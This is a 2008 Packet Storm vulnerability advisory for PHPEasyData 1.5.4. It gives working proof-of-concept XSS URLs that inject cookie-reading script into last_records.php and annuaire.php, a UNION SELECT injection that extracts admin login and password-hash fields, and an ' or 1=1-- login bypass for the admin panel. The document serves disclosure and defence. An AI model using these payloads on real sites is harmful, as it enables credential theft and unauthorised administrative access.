phpeasydata-sqlxss.txt

2008-06-11T00:00:00
ID PACKETSTORM:67187
Type packetstorm
Reporter Sylvain THUAL
Modified 2008-06-11T00:00:00

Description

                                        
                                            `-------------  
*PHPEasyData*  
-------------  
  
Informations :  
**************   
Langage : PHP  
Version : 1.5.4  
Website : http://www.phpeasydata.com/  
Problems : Multiple vulnerabilities  
  
Description:  
************  
PHPEasyData is a PHP application which allow you to manage and display on the web your dynamics data and directories.  
  
Details :  
*********  
---------  
** Xss **  
---------  
  
There are multiple xss vulnerabilities.  
Demonstration exploit URL:  
  
-last_records.php:  
http://[website]/last_records.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
-annuaire.php:  
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=&by=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[website]/annuaire.php?annuaire=30&sort_field=2&cat_id=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
http://[website]/annuaire.php?annuaire=%3Cscript%3Ealert(document.cookie)%3C/script%3E  
  
  
-------------------  
** SQL Injection **  
-------------------  
-annuaire.php  
http://[website]/annuaire.php?annuaire=29%20union%20select%20user_pass,user_login,user_fname,user_access%20from%20an_users  
  
With this url we can have the admin password(crypted with md5) for example.  
  
-admin/login.php  
Due to a lack of sanitization of the user input in admin/login.php we can easily get an access to the admin control panel with the login:  
' or 1=1-- /**   
  
  
Credits:  
********  
Autor : Sylvain THUAL   
E-mail : contact@click-internet.fr  
Website : http://www.click-internet.fr  
  
`